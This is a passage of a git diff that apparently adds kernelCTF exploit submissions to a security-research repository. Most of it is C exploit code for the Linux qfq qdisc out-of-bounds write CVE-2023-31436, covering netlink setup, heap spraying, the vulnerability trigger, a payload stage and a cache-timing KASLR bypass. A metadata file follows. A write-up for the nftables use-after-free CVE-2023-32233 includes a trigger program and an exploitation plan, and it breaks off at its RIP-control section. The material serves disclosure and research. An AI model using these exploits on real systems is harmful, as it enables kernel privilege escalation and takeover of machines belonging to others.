nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + // Set MTU size, used to trigger the vulnerability + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = LMAX; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object +int create_tcfilter(int s, int ifindex, u32 
parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(1, 8192); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + 
attr->nla_len; + + + // This is the sizetable we spray alongside each qdisc + attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + sizespec->cell_log = 10; + sizespec->size_log = 0; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16); + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16); + attr->nla_len += nested->nla_len; + + fake_group.id++; + memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group)); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Delete a class from a qdisc +int delete_class(int s, int ifindex, u32 handle) { + L("deleting class %x", handle); + + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_DELTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to delete class!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN; + + if (lmax) { + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + attr->nla_len += nested->nla_len; + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + } + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + +int spray_one_umem(void* buf) { + struct xdp_umem_reg mr = {0}; + // __u64 addr; /* Start of packet data area */ + // __u64 len; /* 
Length of packet data area */ + // __u32 chunk_size; + // __u32 headroom; + // __u32 flags; + + mr.addr = (u64)buf; + mr.chunk_size = 0x1000; + mr.len = 4 * 0x1000; // anything other than 8 is fine (the protocol we try to classify with the fake proto) + mr.headroom = 0; + mr.flags = 0; + + int s = socket(AF_XDP, SOCK_RAW, 0); + FAIL_IF(s < 0); + + FAIL_IF(setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0); + return s; +} + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. +// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + FAIL_IF(_pin_to_cpu(0) != 0); + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // Up the device and set the MTU to LMAX, which will trigger the vulnerability + // later on. + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object. + if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) { + return -1; + } + + #define NUM_SOCKETS2 4 + int payloads[NUM_SOCKETS2*2] = {0}; + + #define _WAIT_FOR_WAKEUP() { \ + while (wake != i) { \ + sleep(1); \ + if (done) { \ + return 0; \ + } \ + } \ + wake = 0; \ + } + + for (int i = 0; i < NUM_SOCKETS2*2; i++) { + if (payloads[i] > 0) { + close(payloads[i]); + payloads[i] = 0; + } + } + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i] = spray_one_umem(payload); + FAIL_IF(payloads[i] < 0); + } + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0); + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i + NUM_SOCKETS2] = spray_one_umem(payload); + FAIL_IF(payloads[i + NUM_SOCKETS2] < 0); + } + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + if (i == qdisc_trigger_bug) { + L("worker %d is entering stage 1b: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. 
+ if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // trigger vulnerability + // This will create a qfq_aggregate with an OOB group as controlled + // by the MTU we set earlier. + if (create_helper_class(s, loindex, handle_oob, 0, 0) != 0) { + E("failed to trigger vulnerability :("); + return -1; + } + + close(ss); + close(sc); + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + return -1; + } + + { + // trigger payload + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // trigger, what we send does not matter + FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + maybe_win(); + + // payload failed .. + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + return -1; + } +} + +int main(int argc, char* argv[]) { + // main orchestration routine. 
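+    // Orchestration overview (see the code below):
+    //   1. rebase the hardcoded gadget/symbol addresses, either from a
+    //      kernel base passed in argv[1] or via get_kernel_base(),
+    //   2. spawn ATTEMPT_LARGE_EVERY bug_worker()s, each spraying a qfq
+    //      qdisc plus sizetable into dyn-kmalloc-8192 in its own netns,
+    //   3. wake one worker to perform the bit flip, then wake the others
+    //      to fire the fake classify() payload; retry up to 10 times.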
+ + // Hopefully less noise due to thread creation + FAIL_IF(_pin_to_cpu(1) != 0); + + if (argc == 2) { + u64 base = strtoull(argv[1], NULL, 16); + L("using supplied kernel base: %llx", base); + u64 diff = base - 0xffffffff81000000ull; + L("diff: %llx", diff); + + #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + } else { + FAIL_IF(get_kernel_base() < 0); + } + + + payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(payload == MAP_FAILED); + prep_tcf_proto_payload(payload); + prep_stage1_large_payload(&fake_group); + + for (int try = 0; try < 10; try++) { + int worker_i = 1; + + L("spraying qdiscs .."); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) { + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + } + + worker_i--; + qdisc_trigger_bug = 10; + + wake = qdisc_trigger_bug; + EVENT_WAIT(parent_notify); + + L("triggering payloads .."); + for (int i = 1; i <= worker_i; i++) { + if (i != qdisc_trigger_bug) { + wake = i; + EVENT_WAIT(parent_notify); + } + } + + E("attempt failed .("); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + sleep(1); + } + + E("we failed .("); + return 0; +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + + +void prefetch(void* p) +{ + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + + +#define FLUSH_SIZE (4*1024*1024) +u8 __mem[FLUSH_SIZE]; + +inline void flush_cache() { + for (int i = 0; i < FLUSH_SIZE; i++) { + __mem[i] = i; + } +} + +size_t flushandreload(void* addr) // row miss +{ + flush_cache(); + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int get_kernel_base() { + L("getting kernel base address .."); + + #define START 0xffffffff80000000ull + #define END 0xfffffffff0000000ull + #define STEP 0x0000000001000000ull + size_t times[(END - START) / STEP] = {0}; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = START + STEP * (u64)ti; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + leak_kernel_base = START + STEP * (u64)mini; + L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]); + + i64 diff = 0xffffffff81000000 - leak_kernel_base; + L("diff: %lld", diff); + + #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + return 0; +} diff --git 
a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
new file mode 100644
index 00000000..25dfabd6
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
@@ -0,0 +1,24 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": ["exp52"],
+    "vulnerability": {
+        "summary": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.",
+        "cve": "CVE-2023-31436",
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d",
+        "affected_versions": ["2.6.0 - 6.2.12"],
+        "requirements": {
+            "attack_surface": ["userns"],
+            "capabilities": ["CAP_NET_ADMIN"],
+            "kernel_config": [
+                "CONFIG_NET_SCH_QFQ"
+            ]
+        }
+    },
+    "exploits": {
+        "mitigation-6.1": {
+            "uses": ["userns"],
+            "stability_notes": "5% success rate",
+            "requires_separate_kaslr_leak": true
+        }
+    }
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz
new file mode 100644
index 00000000..81890120
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz differ
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md
new file mode 100644
index 00000000..908b0efd
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md
@@ -0,0 +1,210 @@
+# Attacking Objects
+
+- **Information leak/KASLR bypass**: nft_chain + nft_rule/nft_expr [dyn-kmalloc-256]
+- **RIP control**: nft_rule/nft_expr (RIP hijacked via expr->deactivate()) [dyn-kmalloc-256]
+
+# Overview
+
+This exploit was written based on https://www.openwall.com/lists/oss-security/2023/05/15/5; the exploit strategy differs from the original code.
+
+# Triggering Vulnerability
+
+The vulnerability is caused by access to an anonymous nft_set that is being deleted.
+
+```c
+void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+                              struct nft_set_binding *binding,
+                              enum nft_trans_phase phase)
+{
+    switch (phase) {
+    case NFT_TRANS_PREPARE: // [1]
+        set->use--;
+        return;
+    case NFT_TRANS_ABORT:
+    case NFT_TRANS_RELEASE:
+        set->use--;
+        fallthrough;
+    default:
+        nf_tables_unbind_set(ctx, set, binding,
+                             phase == NFT_TRANS_COMMIT);
+    }
+}
+EXPORT_SYMBOL_GPL(nf_tables_deactivate_set);
+
+void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
+{
+    if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
+        nft_set_destroy(ctx, set);
+}
+EXPORT_SYMBOL_GPL(nf_tables_destroy_set);
+```
+
+Because the `nf_tables_deactivate_set` function does not change an anonymous set to the inactive state in the prepare phase [1], the set can still be accessed after it has been destroyed by the `nf_tables_destroy_set` function.
+
+To trigger the vulnerability, create an anonymous nft_set and a rule with a lookup expr referencing it. The UAF is then triggered by deleting the rule and afterwards deleting the set, or by adding/deleting elements of the set. Note that `nf_tables_deactivate_set` is called while deleting the rule with the lookup expr.
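+
+For reference, the netlink plumbing for this trigger, sketched with libmnl/libnftnl
+(the libraries this submission's Makefile builds against), could look roughly as
+follows. This is an illustrative sketch rather than the submission's code: table
+`t` and chain `c` are assumed to already exist, the anonymous set and the rule
+binding it must be created within one batch (an unbound anonymous set would not
+survive its transaction), and all error handling is omitted.
+
+```c
+#include <time.h>
+#include <stdint.h>
+#include <libmnl/libmnl.h>
+#include <libnftnl/common.h>
+#include <libnftnl/set.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/expr.h>
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nf_tables.h>
+
+static char buf[2 * MNL_SOCKET_BUFFER_SIZE];
+static uint32_t seq;
+
+static struct mnl_nlmsg_batch *batch_open(void)
+{
+    struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, MNL_SOCKET_BUFFER_SIZE);
+    nftnl_batch_begin(mnl_nlmsg_batch_current(b), seq++);
+    mnl_nlmsg_batch_next(b);
+    return b;
+}
+
+static void batch_send(struct mnl_socket *nl, struct mnl_nlmsg_batch *b)
+{
+    nftnl_batch_end(mnl_nlmsg_batch_current(b), seq++);
+    mnl_nlmsg_batch_next(b);
+    mnl_socket_sendto(nl, mnl_nlmsg_batch_head(b), mnl_nlmsg_batch_size(b));
+    mnl_nlmsg_batch_stop(b);
+}
+
+int main(void)
+{
+    struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
+    mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID);
+    seq = time(NULL);
+
+    // The anonymous set ...
+    struct nftnl_set *set = nftnl_set_alloc();
+    nftnl_set_set_str(set, NFTNL_SET_TABLE, "t");
+    nftnl_set_set_str(set, NFTNL_SET_NAME, "__anon");
+    nftnl_set_set_u32(set, NFTNL_SET_ID, 1);
+    nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_ANONYMOUS | NFT_SET_CONSTANT);
+    nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, sizeof(uint32_t));
+
+    // ... and a rule whose lookup expr binds it; an immediate expr fills
+    // the source register the lookup reads from.
+    struct nftnl_rule *rule = nftnl_rule_alloc();
+    nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, "t");
+    nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "c");
+    struct nftnl_expr *imm = nftnl_expr_alloc("immediate");
+    uint32_t zero = 0;
+    nftnl_expr_set_u32(imm, NFTNL_EXPR_IMM_DREG, NFT_REG_1);
+    nftnl_expr_set(imm, NFTNL_EXPR_IMM_DATA, &zero, sizeof(zero));
+    nftnl_rule_add_expr(rule, imm);
+    struct nftnl_expr *lookup = nftnl_expr_alloc("lookup");
+    nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);
+    nftnl_expr_set_str(lookup, NFTNL_EXPR_LOOKUP_SET, "__anon");
+    nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SET_ID, 1);
+    nftnl_rule_add_expr(rule, lookup);
+
+    // Batch 1: create set + rule together, so the set ends up bound.
+    struct mnl_nlmsg_batch *b = batch_open();
+    struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(b),
+            NFT_MSG_NEWSET, NFPROTO_IPV4, NLM_F_CREATE, seq++);
+    nftnl_set_nlmsg_build_payload(nlh, set);
+    mnl_nlmsg_batch_next(b);
+    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(b),
+            NFT_MSG_NEWRULE, NFPROTO_IPV4, NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule);
+    mnl_nlmsg_batch_next(b);
+    batch_send(nl, b);
+
+    // Batch 2: delete the rule (no handle set, so the chain is flushed).
+    // nf_tables_deactivate_set() runs in the prepare phase and the
+    // anonymous set is destroyed at commit time -- but it is never
+    // marked inactive.
+    b = batch_open();
+    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(b),
+            NFT_MSG_DELRULE, NFPROTO_IPV4, 0, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule);
+    mnl_nlmsg_batch_next(b);
+    batch_send(nl, b);
+
+    // Batch 3: the stale set can still be addressed by name, so deleting
+    // it (or touching its elements) now operates on freed memory.
+    b = batch_open();
+    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(b),
+            NFT_MSG_DELSET, NFPROTO_IPV4, 0, seq++);
+    nftnl_set_nlmsg_build_payload(nlh, set);
+    mnl_nlmsg_batch_next(b);
+    batch_send(nl, b);
+    return 0;
+}
+```
+
+In the real exploit, the window between the second and third transaction is where
+the target objects are sprayed, as described in the next section.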
+
+# From UAF to double free
+
+```c
+static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+{
+    int i;
+
+    if (WARN_ON(set->use > 0))
+        return;
+
+    for (i = 0; i < set->num_exprs; i++)
+        nft_expr_destroy(ctx, set->exprs[i]);
+
+    set->ops->destroy(set);
+    nft_set_catchall_destroy(ctx, set);
+    kfree(set->name); // [2]
+    kvfree(set);
+}
+```
+
+When the nft_lookup expr is destroyed, the `nft_set_destroy` function is called and frees `set->name` [2]. When the set is destroyed again, `nft_set_destroy` is called one more time on this nft_set, resulting in a double free. In between the two calls to `nft_set_destroy`, I create another target nft_set that reuses the freed allocation, so the second call frees this new set as well. At this time, I make the length of the set's name between 193 and 256 bytes to place it in dyn-kmalloc-256.
+
+```c
+struct nft_chain {
+    struct nft_rule_blob __rcu *blob_gen_0;
+    struct nft_rule_blob __rcu *blob_gen_1;
+    struct list_head rules;
+    struct list_head list;
+    struct rhlist_head rhlhead;
+    struct nft_table *table;
+    u64 handle;
+    u32 use;
+    u8 flags:5,
+       bound:1,
+       genmask:2;
+    char *name;
+    u16 udlen;
+    u8 *udata; // [3]
+
+    /* Only used during control plane commit phase: */
+    struct nft_rule_blob *blob_next;
+};
+```
+
+Then I utilize the udata field [3] of the nft_chain structure for the information leak and RIP control. To do this, the udata of an nft_chain is allocated in dyn-kmalloc-256 so that it overlaps with the set->name of the target set.
+
+```c
+static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+                              u8 policy, u32 flags,
+                              struct netlink_ext_ack *extack)
+...
+
+    if (nla[NFTA_CHAIN_USERDATA]) {
+        chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT); // [4]
+        if (chain->udata == NULL) {
+            err = -ENOMEM;
+            goto err_destroy_chain;
+        }
+        chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);
+    }
+```
+
+The udata of the nft_chain is user-supplied input, copied in the `nf_tables_addchain` function [4].
+
+# KASLR Bypass and Information Leak
+
+To bypass KASLR, I used `struct nft_rule`. The nft_rule contains a `struct nft_expr` [5], which stores the address of a `struct nft_expr_ops` [6]. Since the `nft_expr_ops` structures live at fixed offsets in the kernel image, we can bypass KASLR by reading this address. We can also get a heap address by reading the list in the struct nft_rule. This address will be used later to create the fake ops and store the ROP payload. In this exploit, I used `nft_counter_ops`.
+
+```c
+struct nft_rule {
+    struct list_head list;
+    u64 handle:42,
+        genmask:2,
+        dlen:12,
+        udata:1;
+    unsigned char data[]
+        __attribute__((aligned(__alignof__(struct nft_expr)))); // [5]
+};
+```
+
+```c
+struct nft_expr {
+    const struct nft_expr_ops *ops; // [6]
+    unsigned char data[]
+        __attribute__((aligned(__alignof__(u64))));
+};
+```
+
+# RIP Control
+
